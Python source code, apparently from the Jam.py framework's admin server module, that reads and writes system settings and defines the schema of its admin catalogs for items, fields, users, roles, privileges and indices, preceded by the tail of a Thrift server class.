except TTransport.TTransportException:
pass
except Exception as x:
logging.exception(x)
def _collectChildren(self):
while self.children:
try:
pid, status = os.waitpid(0, os.WNOHANG)
except os.error:
pid = None
if pid:
self.children.remove(pid)
else:
break
|
adm_server.py | import os
import json
import hashlib
import datetime
import time
import zipfile
import shutil
import traceback
import sqlite3
import zlib
import base64
from threading import Thread, Lock
from operator import itemgetter
from esprima import parseScript, nodes
import jam.common as common
from jam.common import error_message, file_read, file_write
import jam.db.db_modules as db_modules
from jam.server_classes import *
from jam.events import get_events
from jam.execute import execute_sql
import jam.langs as langs
from werkzeug._compat import iteritems, iterkeys, to_unicode, to_bytes, text_type, string_types
def read_language(task):
result = None
con = task.create_connection()
try:
cursor = con.cursor()
cursor.execute('SELECT F_LANGUAGE FROM SYS_PARAMS')
rec = cursor.fetchall()
finally:
con.rollback()
con.close()
if rec:
result = rec[0][0]
if not result:
result = 1
return result
def read_setting(task):
sql = 'SELECT '
keys = list(iterkeys(common.DEFAULT_SETTINGS))
for key in keys:
sql += 'F_%s, ' % key
sql = sql[:-2]
sql += ' FROM SYS_PARAMS'
result = None
con = task.create_connection()
try:
cursor = con.cursor()
cursor.execute(sql)
rec = cursor.fetchall()
finally:
con.rollback()
con.close()
rec = rec[0]
common.SETTINGS = {}
for i, key in enumerate(keys):
setting_type = type(common.DEFAULT_SETTINGS[key])
try:
if rec[i] is None:
common.SETTINGS[key] = common.DEFAULT_SETTINGS[key]
else:
common.SETTINGS[key] = setting_type(rec[i])
except:
common.SETTINGS[key] = common.DEFAULT_SETTINGS[key]
for key in iterkeys(common.SETTINGS):
common.__dict__[key] = common.SETTINGS[key]
def write_setting(task):
sql = 'UPDATE SYS_PARAMS SET '
params = []
for key in iterkeys(common.DEFAULT_SETTINGS):
value = common.SETTINGS[key]
setting_type = type(common.DEFAULT_SETTINGS[key])
if setting_type == bool:
if value:
value = 1
else:
value = 0
if setting_type in string_types:
sql += 'F_%s="%s", ' % (key, value)
else:
sql += 'F_%s=%s, ' % (key, value)
sql = sql[:-2]
con = task.create_connection()
try:
cursor = con.cursor()
cursor.execute(sql)
con.commit()
except:
con.rollback()
finally:
con.close()
def get_value_list(str_list, order=False):
def getKey(item):
return item[1]
result = []
for i, s in enumerate(str_list):
result.append([i + 1, s])
if order:
result = sorted(result, key=getKey)
return result
def create_items(task):
task.items = []
task.sys_catalogs = Group(task, task, 'catalogs', task.language('catalogs'))
task.sys_tables = Group(task, task, 'tables', task.language('details'), visible=False)
task.sys_items = task.sys_catalogs.add_catalog('sys_items', 'Items', 'SYS_ITEMS')
task.sys_fields = task.sys_tables.add_table('sys_fields', task.language('fields'), 'SYS_FIELDS')
task.sys_params = task.sys_catalogs.add_catalog('sys_params', '', 'SYS_PARAMS')
task.sys_langs = task.sys_catalogs.add_catalog('sys_langs', 'Languages', 'SYS_LANGS')
task.sys_params.add_field(1, 'id', 'ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_params.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_params.add_field(3, 'f_safe_mode', task.language('safe_mode'), common.BOOLEAN)
task.sys_params.add_field(4, 'f_debugging', task.language('debugging'), common.BOOLEAN, edit_visible=False)
task.sys_params.add_field(5, 'f_con_pool_size', task.language('con_pool_size'), common.INTEGER, required=False)
task.sys_params.add_field(6, 'f_language', task.language('language'), common.INTEGER, True, task.sys_langs, 'f_name', enable_typeahead=True)
task.sys_params.add_field(7, 'f_version', task.language('version'), common.TEXT, size = 256)
task.sys_params.add_field(8, 'f_mp_pool', task.language('mp_pool'), common.BOOLEAN)
task.sys_params.add_field(9, 'f_persist_con', task.language('persist_con'), common.BOOLEAN)
task.sys_params.add_field(10, 'f_single_file_js', task.language('single_file_js'), common.BOOLEAN)
task.sys_params.add_field(11, 'f_dynamic_js', task.language('dynamic_js'), common.BOOLEAN)
task.sys_params.add_field(12, 'f_compressed_js', task.language('compressed_js'), common.BOOLEAN)
task.sys_params.add_field(13, 'f_field_id_gen', 'f_field_id_gen', common.INTEGER)
task.sys_params.add_field(14, 'f_timeout', task.language('session_timeout'), common.INTEGER)
task.sys_params.add_field(15, 'f_delete_reports_after', task.language('delete_reports_after'), common.INTEGER)
task.sys_params.add_field(16, 'f_ignore_change_ip', task.language('ignore_change_ip'), common.BOOLEAN)
task.sys_params.add_field(17, 'f_history_item', task.language('history'), common.INTEGER, False, task.sys_items, 'f_name')
task.sys_params.add_field(18, 'f_lock_item', 'Lock item', common.INTEGER, False, task.sys_items, 'f_name')
task.sys_params.add_field(19, 'f_sys_group', task.language('system_group'), common.INTEGER)
task.sys_params.add_field(20, 'f_theme', task.language('theme'), common.INTEGER, required=True, lookup_values=get_value_list(common.THEMES))
task.sys_params.add_field(21, 'f_small_font', task.language('small_font'), common.BOOLEAN)
task.sys_params.add_field(22, 'f_full_width', task.language('full_width'), common.BOOLEAN)
task.sys_params.add_field(23, 'f_forms_in_tabs', task.language('forms_in_tabs'), common.BOOLEAN)
task.sys_params.add_field(24, 'f_max_content_length', 'Max content length (MB)', common.INTEGER)
task.sys_params.add_field(25, 'f_secret_key', 'Secret key', common.TEXT, size = 256)
task.sys_items.add_field(1, 'id', 'ID', common.INTEGER, visible=True, edit_visible=False)
task.sys_items.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_items.add_field(3, 'parent', 'Parent id', common.INTEGER, visible=False, edit_visible=False)
task.sys_items.add_field(4, 'task_id', 'Task id', common.INTEGER, visible=False, edit_visible=False)
task.sys_items.add_field(5, 'type_id', 'Type id', common.INTEGER, visible=False, edit_visible=False)
task.sys_items.add_field(6, 'table_id', 'Table id', common.INTEGER, visible=False, edit_visible=False)
task.sys_items.add_field(7, 'has_children', 'Has_children', common.BOOLEAN, visible=False, edit_visible=False)
task.sys_items.add_field(8, 'f_index', 'Index', common.INTEGER, visible=False, edit_visible=False)
task.sys_items.add_field(9, 'f_name', task.language('caption'), common.TEXT, required=True, size=256)
task.sys_items.add_field(10, 'f_item_name', task.language('name'), common.TEXT, required=True, size=256)
task.sys_items.add_field(11, 'f_table_name', task.language('table_name'), common.TEXT, size=256)
task.sys_items.add_field(12, 'f_gen_name', task.language('gen_name'), common.TEXT, size=256)
task.sys_items.add_field(13, 'f_view_template', task.language('report_template'), common.TEXT, size=256)
task.sys_items.add_field(14, 'f_visible', task.language('visible'), common.BOOLEAN)
task.sys_items.add_field(15, 'f_soft_delete', task.language('soft_delete'), common.BOOLEAN)
task.sys_items.add_field(16, 'f_client_module', task.language('client_module'), common.LONGTEXT, visible=False, edit_visible=False)
task.sys_items.add_field(17, 'f_web_client_module', task.language('client_module'), common.LONGTEXT, visible=False, edit_visible=False)
task.sys_items.add_field(18, 'f_server_module', task.language('server_module'), common.LONGTEXT, visible=False, edit_visible=False)
task.sys_items.add_field(19, 'f_info', 'Info', common.LONGTEXT, visible=False, edit_visible=False)
task.sys_items.add_field(20, 'f_virtual_table', task.language('virtual_table'), common.BOOLEAN)
task.sys_items.add_field(21, 'f_js_external', task.language('js_external'), common.BOOLEAN)
task.sys_items.add_field(22, 'f_js_filename', 'js_file_name', common.TEXT, size=1024)
task.sys_items.add_field(23, 'f_primary_key', task.language('primary_key'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_items.add_field(24, 'f_deleted_flag', task.language('deleted_flag'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_items.add_field(25, 'f_master_id', task.language('master_id'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_items.add_field(26, 'f_master_rec_id', task.language('master_rec_id'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_items.add_field(27, 'f_js_funcs', 'f_js_funcs', common.LONGTEXT, visible=False, edit_visible=False)
task.sys_items.add_field(28, 'f_keep_history', task.language('history'), common.BOOLEAN)
task.sys_items.add_field(29, 'f_edit_lock', task.language('edit_lock'), common.BOOLEAN)
task.sys_items.add_field(30, 'sys_id', 'sys_id', common.INTEGER)
task.sys_items.add_field(31, 'f_select_all', task.language('select_all'), common.BOOLEAN)
task.sys_items.add_filter('id', 'ID', 'id', common.FILTER_EQ, visible=False)
task.sys_items.add_filter('not_id', 'ID', 'id', common.FILTER_NE, visible=False)
task.sys_items.add_filter('parent', 'Parent', 'parent', common.FILTER_EQ, visible=False)
task.sys_items.add_filter('task_id', 'Task', 'task_id', common.FILTER_EQ, visible=False)
task.sys_items.add_filter('type_id', 'Type', 'type_id', common.FILTER_IN, visible=False)
task.sys_items.add_filter('table_id', 'Type', 'table_id', common.FILTER_EQ, visible=False)
task.sys_items.add_filter('type_id_gt', 'Type', 'type_id', common.FILTER_GT, visible=False)
task.sys_tasks = task.sys_catalogs.add_catalog('sys_tasks', '', 'SYS_TASKS')
task.sys_tasks.add_field(1, 'id', 'Record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_tasks.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_tasks.add_field(3, 'task_id', 'Task ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_tasks.add_field(4, 'f_name', task.language('caption'), common.TEXT, required=True, size=256, edit_visible=False)
task.sys_tasks.add_field(5, 'f_item_name', task.language('name'), common.TEXT, required=True, size=256, edit_visible=False)
task.sys_tasks.add_field(6, 'f_manual_update', task.language('manual_update'), common.BOOLEAN, visible=False, edit_visible=False)
task.sys_tasks.add_field(7, 'f_db_type', task.language('db_type'), common.INTEGER, required=True, lookup_values=get_value_list(db_modules.DB_TYPE))
task.sys_tasks.add_field(8, 'f_alias', task.language('db_name'), common.TEXT, required=True, size = 30)
task.sys_tasks.add_field(9, 'f_login', task.language('login'), common.TEXT, size = 30)
task.sys_tasks.add_field(10, 'f_password', task.language('password'), common.TEXT, size = 30)
task.sys_tasks.add_field(11, 'f_host', task.language('host'), common.TEXT, size = 30)
task.sys_tasks.add_field(12, 'f_port', task.language('port'), common.TEXT, size = 10)
task.sys_tasks.add_field(13, 'f_encoding', task.language('encoding'), common.TEXT, size = 30)
task.sys_tasks.add_field(14, 'f_server', 'Server', common.TEXT, size = 30)
task.sys_tasks.add_filter('task_id', 'Task ID', 'task_id', common.FILTER_EQ, visible=False)
task.sys_lookup_lists = task.sys_catalogs.add_catalog('sys_lookup_lists', 'Lookup lists', 'SYS_LOOKUP_LISTS')
task.sys_lookup_lists.add_field(1, 'id', 'ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_lookup_lists.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_lookup_lists.add_field(3, 'f_name', task.language('name'), common.TEXT, required=True, size=256)
task.sys_lookup_lists.add_field(4, 'f_lookup_values_text', 'Text to store lookup_values', common.LONGTEXT)
task.sys_field_lookups = task.sys_tables.add_table('sys_field_lookups', 'Lookup item', 'SYS_FIELD_LOOKUPS')
task.sys_field_lookups.add_field(1, 'id', 'Record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_field_lookups.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_field_lookups.add_field(3, 'f_value', task.language('value'), common.INTEGER)
task.sys_field_lookups.add_field(4, 'f_lookup', task.language('lookup_value'), common.TEXT, size=612)
task.sys_fields.add_field(1, 'id', 'Record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_fields.add_field(2, 'deleted', 'Deleted', common.INTEGER, visible=False, edit_visible=False)
task.sys_fields.add_field(3, 'owner_id', 'Owner ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_fields.add_field(4, 'owner_rec_id', 'Owner record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_fields.add_field(5, 'task_id', 'Task ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_fields.add_field(6, 'f_name', task.language('caption'), common.TEXT, True, size=256)
task.sys_fields.add_field(7, 'f_field_name', task.language('name'), common.TEXT, True, size=256)
task.sys_fields.add_field(8, 'f_db_field_name', task.language('db_field_name'), common.TEXT, False, size=256)
task.sys_fields.add_field(9, 'f_data_type', task.language('data_type'), common.INTEGER, True, False, lookup_values=get_value_list(common.FIELD_TYPES))
task.sys_fields.add_field(10, 'f_size', task.language('size'), common.INTEGER)
task.sys_fields.add_field(11, 'f_object', task.language('object'), common.INTEGER, False, task.sys_items, 'f_item_name')
task.sys_fields.add_field(12, 'f_object_field', task.language('object_field'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_fields.add_field(13, 'f_object_field1', task.language('object_field') + ' 2', common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_fields.add_field(14, 'f_object_field2', task.language('object_field') + ' 3', common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_fields.add_field(15, 'f_master_field', task.language('master_field'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_fields.add_field(16, 'f_multi_select', task.language('multi_select'), common.BOOLEAN)
task.sys_fields.add_field(17, 'f_multi_select_all', task.language('multi_select_all'), common.BOOLEAN)
task.sys_fields.add_field(18, 'f_enable_typehead', task.language('enable_typehead'), common.BOOLEAN)
task.sys_fields.add_field(19, 'f_lookup_values', task.language('lookup_values'), common.INTEGER, False, task.sys_lookup_lists, 'f_name')
task.sys_fields.add_field(20, 'f_required', task.language('required'), common.BOOLEAN)
task.sys_fields.add_field(21, 'f_calculated', task.language('calculated'), common.BOOLEAN, visible=False, edit_visible=False)
task.sys_fields.add_field(22, 'f_default', task.language('default'), common.BOOLEAN)
task.sys_fields.add_field(23, 'f_read_only', task.language('read_only'), common.BOOLEAN)
task.sys_fields.add_field(24, 'f_alignment', task.language('alignment'), common.INTEGER, lookup_values=get_value_list(common.ALIGNMENT))
task.sys_fields.add_field(25, 'f_default_value', task.language('default_value'), common.TEXT, False, False, size=256)
task.sys_fields.add_field(26, 'f_help', task.language('help'), common.LONGTEXT, visible=False)
task.sys_fields.add_field(27, 'f_placeholder', task.language('placeholder'), common.TEXT, visible=False, size=256)
task.sys_fields.add_field(28, 'f_mask', 'Mask', common.TEXT, visible=False, size=30)
task.sys_fields.add_field(29, 'f_default_lookup_value', task.language('default_value'), common.INTEGER, lookup_values=[[0, '']])
task.sys_fields.add_field(30, 'f_image_edit_width', 'Edit width', common.INTEGER)
task.sys_fields.add_field(31, 'f_image_edit_height', 'Edit height', common.INTEGER)
task.sys_fields.add_field(32, 'f_image_view_width', 'View width', common.INTEGER)
task.sys_fields.add_field(33, 'f_image_view_height', 'View height', common.INTEGER)
task.sys_fields.add_field(34, 'f_image_placeholder', 'Placeholder image', common.IMAGE, image_edit_width=230)
task.sys_fields.add_field(35, 'f_image_camera', 'Capture from camera', common.BOOLEAN)
task.sys_fields.add_field(36, 'f_file_download_btn', 'Download btn', common.BOOLEAN)
task.sys_fields.add_field(37, 'f_file_open_btn', 'Open btn', common.BOOLEAN)
task.sys_fields.add_field(38, 'f_file_accept', 'Accept', common.TEXT, size=512)
task.sys_fields.add_filter('id', 'ID', 'id', common.FILTER_EQ, visible=False)
task.sys_fields.add_filter('owner_rec_id', 'Owner record ID', 'owner_rec_id', common.FILTER_IN, visible=False)
task.sys_fields.add_filter('task_id', 'Task', 'task_id', common.FILTER_EQ, visible=False)
task.sys_fields.add_filter('not_id', 'not ID', 'id', common.FILTER_NE, visible=False)
task.sys_fields.add_filter('object', 'Object ID', 'f_object', common.FILTER_EQ, visible=False)
task.sys_fields.add_filter('master_field_is_null', 'Master field', 'f_master_field', common.FILTER_ISNULL, visible=False)
task.sys_fields.add_filter('master_field', 'Master field', 'f_master_field', common.FILTER_EQ, visible=False)
task.item_fields = task.sys_items.add_detail(task.sys_fields)
task.sys_report_params = task.sys_tables.add_table('sys_report_params', task.language('report_params'), 'SYS_REPORT_PARAMS')
task.sys_report_params.add_field(1, 'id', 'Record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_report_params.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_report_params.add_field(3, 'owner_id', 'Owner ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_report_params.add_field(4, 'owner_rec_id', 'Owner record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_report_params.add_field(5, 'task_id', 'Task ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_report_params.add_field(6, 'f_index', task.language('index'), common.INTEGER, visible=False, edit_visible=False)
task.sys_report_params.add_field(7, 'f_name', task.language('caption'), common.TEXT, True, size = 30)
task.sys_report_params.add_field(8, 'f_param_name', task.language('name'), common.TEXT, True, size = 30)
task.sys_report_params.add_field(9, 'f_data_type', task.language('data_type'), common.INTEGER, True, False, lookup_values=get_value_list(common.FIELD_TYPES))
task.sys_report_params.add_field(10, 'f_size', task.language('size'), common.INTEGER, visible=False, edit_visible=False)
task.sys_report_params.add_field(11, 'f_object', task.language('object'), common.INTEGER, False, task.sys_items, 'f_name')
task.sys_report_params.add_field(12, 'f_object_field', task.language('object_field'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_report_params.add_field(13, 'f_object_field1', task.language('object_field'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_report_params.add_field(14, 'f_object_field2', task.language('object_field'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_report_params.add_field(15, 'f_multi_select', task.language('multi_select'), common.BOOLEAN)
task.sys_report_params.add_field(16, 'f_multi_select_all', task.language('multi_select_all'), common.BOOLEAN)
task.sys_report_params.add_field(17, 'f_enable_typehead', task.language('enable_typehead'), common.BOOLEAN)
task.sys_report_params.add_field(18, 'f_lookup_values', task.language('lookup_values'), common.INTEGER, False, task.sys_lookup_lists, 'f_name')
task.sys_report_params.add_field(19, 'f_required', task.language('required'), common.BOOLEAN)
task.sys_report_params.add_field(20, 'f_visible', task.language('visible'), common.BOOLEAN)
task.sys_report_params.add_field(21, 'f_alignment', task.language('alignment'), common.INTEGER, lookup_values=get_value_list(common.ALIGNMENT))
task.sys_report_params.add_field(22, 'f_master_field', task.language('master_field'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_report_params.add_field(23, 'f_help', task.language('help'), common.LONGTEXT, visible=False)
task.sys_report_params.add_field(24, 'f_placeholder', task.language('placeholder'), common.TEXT, visible=False, size=256)
task.sys_report_params.add_filter('owner_rec_id', 'Owner rec ID ', 'owner_rec_id', common.FILTER_EQ, visible=False)
task.sys_report_params.add_filter('task_id', 'Task ID', 'task_id', common.FILTER_EQ, visible=False)
task.sys_indices = task.sys_tables.add_table('sys_indices', task.language('indices'), 'SYS_INDICES')
task.sys_indices.add_field(1, 'id', 'Record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_indices.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_indices.add_field(3, 'owner_id', 'Owner ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_indices.add_field(4, 'owner_rec_id', 'Owner record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_indices.add_field(5, 'task_id', 'Task ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_indices.add_field(6, 'f_index_name', task.language('index_name'), common.TEXT, True, size = 100)
task.sys_indices.add_field(7, 'descending', task.language('descending'), common.BOOLEAN)
task.sys_indices.add_field(8, 'f_unique_index', task.language('unique_index'), common.BOOLEAN)
task.sys_indices.add_field(9, 'f_foreign_index', task.language('foreign_index'), common.BOOLEAN, visible=False, edit_visible=False)
task.sys_indices.add_field(10, 'f_foreign_field', task.language('foreign_field'), common.INTEGER, False, task.sys_fields, 'f_field_name', visible=False, edit_visible=False)
task.sys_indices.add_field(11, 'f_fields_list', task.language('fields'), common.TEXT, size = 100, visible=False, edit_visible=False)
task.sys_indices.add_filter('id', 'ID', 'id', common.FILTER_EQ, visible=False)
task.sys_indices.add_filter('owner_rec_id', 'Owner record ID', 'owner_rec_id', common.FILTER_EQ, visible=False)
task.sys_indices.add_filter('task_id', 'Task ID', 'task_id', common.FILTER_EQ, visible=False)
task.sys_indices.add_filter('foreign_index', 'Owner record ID', 'f_foreign_index', common.FILTER_EQ, visible=False)
task.sys_filters = task.sys_tables.add_table('sys_filters', task.language('filters'), 'SYS_FILTERS')
task.sys_filters.add_field(1, 'id', 'Record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_filters.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_filters.add_field(3, 'owner_id', 'Owner ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_filters.add_field(4, 'owner_rec_id', 'Owner record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_filters.add_field(5, 'task_id', 'Task ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_filters.add_field(6, 'f_index', task.language('index'), common.INTEGER, visible=False, edit_visible=False)
task.sys_filters.add_field(7, 'f_field', task.language('field'), common.INTEGER, False, task.sys_fields, 'f_field_name')
task.sys_filters.add_field(8, 'f_name', task.language('caption'), common.TEXT, True)
task.sys_filters.add_field(9, 'f_filter_name', task.language('name'), common.TEXT, True)
task.sys_filters.add_field(10, 'f_data_type', task.language('data_type'), common.INTEGER, False, visible=False, edit_visible=False, lookup_values=get_value_list(common.FIELD_TYPES))
task.sys_filters.add_field(11, 'f_type', task.language('filter_type'), common.INTEGER, False, lookup_values=get_value_list(common.FILTER_STRING))
task.sys_filters.add_field(12, 'f_multi_select_all', task.language('multi_select_all'), common.BOOLEAN, edit_visible=False)
task.sys_filters.add_field(13, 'f_visible', task.language('visible'), common.BOOLEAN)
task.sys_filters.add_field(14, 'f_help', task.language('help'), common.LONGTEXT, visible=False)
task.sys_filters.add_field(15, 'f_placeholder', task.language('placeholder'), common.TEXT, visible=False, size=256)
task.sys_filters.add_filter('owner_rec_id', 'Owner rec ID ', 'owner_rec_id', common.FILTER_EQ, visible=False)
task.sys_filters.add_filter('task_id', 'Task ID', 'task_id', common.FILTER_EQ, visible=False)
task.sys_users = task.sys_catalogs.add_catalog('sys_users', task.language('users'), 'SYS_USERS')
task.sys_roles = task.sys_catalogs.add_catalog('sys_roles', task.language('roles'), 'SYS_ROLES')
task.sys_users.add_field(1, 'id', 'ID', common.INTEGER, visible=True, edit_visible=False)
task.sys_users.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_users.add_field(3, 'f_name', task.language('name'), common.TEXT, required=True, size=128)
task.sys_users.add_field(4, 'f_login', task.language('login'), common.TEXT, required=True, size=128)
task.sys_users.add_field(5, 'f_password', task.language('password'), common.TEXT, required=False, size=128)
task.sys_users.add_field(6, 'f_role', task.language('role'), common.INTEGER, True, task.sys_roles, 'f_name')
task.sys_users.add_field(7, 'f_info', task.language('info'), common.TEXT, edit_visible=False, size=128)
task.sys_users.add_field(8, 'f_admin', task.language('admin'), common.BOOLEAN)
task.sys_users.add_field(9, 'f_psw_hash', 'psw_hash', common.TEXT, edit_visible=False, size=10000)
task.sys_users.add_field(10, 'f_ip', 'ip', common.TEXT, edit_visible=False, size=10000)
task.sys_users.add_field(11, 'f_uuid', 'uuid', common.TEXT, edit_visible=False, size=10000)
task.sys_roles.add_field(1, 'id', 'ID', common.INTEGER, visible=True, edit_visible=False)
task.sys_roles.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_roles.add_field(3, 'f_name', task.language('roles'), common.TEXT, required=True, size=30)
task.sys_roles.add_filter('id', 'ID', 'id', common.FILTER_EQ, visible=False)
task.sys_privileges = task.sys_tables.add_table('sys_privileges', task.language('privileges'), 'SYS_PRIVILEGES')
task.sys_privileges.add_field(1, 'id', 'Record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_privileges.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_privileges.add_field(3, 'owner_id', 'Owner ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_privileges.add_field(4, 'owner_rec_id', 'Owner record ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_privileges.add_field(5, 'item_id', task.language('item'), common.INTEGER, False, task.sys_items, 'f_name')
task.sys_privileges.add_field(6, 'owner_item', task.language('owner'), common.TEXT, size=128)
task.sys_privileges.add_field(7, 'f_can_view', task.language('can_view'), common.BOOLEAN, editable=True)
task.sys_privileges.add_field(8, 'f_can_create', task.language('can_create'), common.BOOLEAN, editable=True)
task.sys_privileges.add_field(9, 'f_can_edit', task.language('can_edit'), common.BOOLEAN, editable=True)
task.sys_privileges.add_field(10, 'f_can_delete', task.language('can_delete'), common.BOOLEAN, editable=True)
task.sys_privileges.add_filter('owner_rec_id', 'Owner record ID', 'owner_rec_id', common.FILTER_EQ, visible=False)
task.role_privileges = task.sys_roles.add_detail(task.sys_privileges)
task.sys_code_editor = task.sys_catalogs.add_catalog('sys_code_editor', 'Editor', '')
task.sys_code_editor.add_field(1, 'id', 'ID', common.INTEGER, visible=True, edit_visible=False)
task.sys_code_editor.add_field(2, 'parent', 'parent', common.INTEGER)
task.sys_code_editor.add_field(3, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_code_editor.add_field(4, 'name', task.language('caption'), common.TEXT, size = 10000)
task.sys_fields_editor = task.sys_catalogs.add_catalog('sys_fields_editor', 'Editor', '')
task.sys_fields_editor.add_field(1, 'id', 'ID', common.INTEGER, visible=True, edit_visible=False)
task.sys_fields_editor.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_fields_editor.add_field(3, 'name', task.language('caption'), common.TEXT, size = 256)
task.sys_fields_editor.add_field(4, 'param1', 'param1', common.BOOLEAN)
task.sys_fields_editor.add_field(5, 'param2', 'param2', common.BOOLEAN)
task.sys_fields_editor.add_field(6, 'param3', 'param3', common.TEXT, size = 6)
task.sys_fields_editor.add_field(7, 'width', task.language('width'), common.INTEGER)
task.sys_fields_editor.add_field(8, 'col_count', task.language('col_count'), common.INTEGER)
task.sys_fields_editor.add_field(9, 'in_well', task.language('in_well'), common.BOOLEAN)
task.sys_fields_editor.add_field(10, 'pagination', 'Pagination', common.BOOLEAN)
task.sys_fields_editor.add_field(11, 'row_count', task.language('row_count'), common.INTEGER)
task.sys_fields_editor.add_field(11, 'row_line_count', task.language('row_line_count'), common.INTEGER)
task.sys_fields_editor.add_field(11, 'freeze_count', task.language('freeze_count'), common.INTEGER)
task.sys_fields_editor.add_field(12, 'expand_selected_row', task.language('expand_selected_row'), common.INTEGER)
task.sys_fields_editor.add_field(13, 'multiselect', task.language('multi_select'), common.BOOLEAN)
task.sys_fields_editor.add_field(14, 'dblclick_edit', task.language('dblclick_edit'), common.BOOLEAN)
task.sys_fields_editor.add_field(15, 'sort_fields', task.language('sort_fields'), common.KEYS, False, task.sys_fields, 'id')
task.sys_fields_editor.add_field(16, 'edit_fields', task.language('edit_fields'), common.KEYS, False, task.sys_fields, 'id')
task.sys_fields_editor.add_field(16, 'edit_fields', task.language('edit_fields'), common.KEYS, False, task.sys_fields, 'id')
task.sys_fields_editor.add_field(17, 'summary_fields', task.language('summary_fields'), common.KEYS, False, task.sys_fields, 'id')
task.sys_fields_editor.add_field(18, 'label_size', task.language('label_size'), common.INTEGER, lookup_values=get_value_list(['xSmall', 'Small', 'Medium', 'Large', 'xLarge']))
task.sys_fields_editor.add_field(19, 'history_button', task.language('history'), common.BOOLEAN)
task.sys_fields_editor.add_field(20, 'refresh_button', task.language('refresh_button'), common.BOOLEAN)
task.sys_fields_editor.add_field(21, 'close_button', task.language('close_button'), common.BOOLEAN)
task.sys_fields_editor.add_field(22, 'close_on_escape', task.language('close_on_escape'), common.BOOLEAN)
task.sys_fields_editor.add_field(23, 'form_border', task.language('form_border'), common.BOOLEAN)
task.sys_fields_editor.add_field(24, 'form_header', task.language('form_header'), common.BOOLEAN)
task.sys_fields_editor.add_field(25, 'enable_search', task.language('enable_search'), common.BOOLEAN)
task.sys_fields_editor.add_field(26, 'enable_filters', task.language('enable_filters'), common.BOOLEAN)
task.sys_fields_editor.add_field(27, 'edit_details', task.language('edit_details'), common.KEYS, False, task.sys_items, 'id')
task.sys_fields_editor.add_field(28, 'view_detail', task.language('view_detail'), common.KEYS, False, task.sys_items, 'id')
task.sys_fields_editor.add_field(29, 'detail_height', 'Detail height', common.INTEGER, False)
task.sys_fields_editor.add_field(30, 'buttons_on_top', 'Buttons on top', common.BOOLEAN)
task.sys_fields_editor.add_field(31, 'height', 'Height', common.INTEGER, False)
task.sys_fields_editor.add_field(32, 'modeless', task.language('modeless'), common.BOOLEAN)
task.sys_fields_editor.add_field(33, 'search_field', task.language('default_search_field'), common.KEYS, False, task.sys_fields, 'id')
task.sys_search = task.sys_catalogs.add_catalog('sys_search', task.language('find_in_task'), '')
task.sys_search.add_field(1, 'id', 'ID', common.INTEGER, visible=True, edit_visible=False)
task.sys_search.add_field(2, 'parent', 'parent', common.INTEGER)
task.sys_search.add_field(3, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_search.add_field(4, 'find_text', task.language('find'), common.TEXT, size = 1000)
task.sys_search.add_field(5, 'case_sensitive', task.language('case_sensitive'), common.BOOLEAN)
task.sys_search.add_field(6, 'whole_words', task.language('whole_words'), common.BOOLEAN)
task.sys_new_group = task.sys_catalogs.add_catalog('sys_new_group', task.language('new_group_type'), '')
task.sys_new_group.add_field(1, 'group_type', 'Group type', common.INTEGER, required=True, lookup_values=get_value_list(common.GROUP_TYPES))
task.sys_languages = task.sys_catalogs.add_catalog('sys_languages', 'Languages', 'SYS_LANGUAGES')
task.sys_languages.add_field(1, 'id', 'ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_languages.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
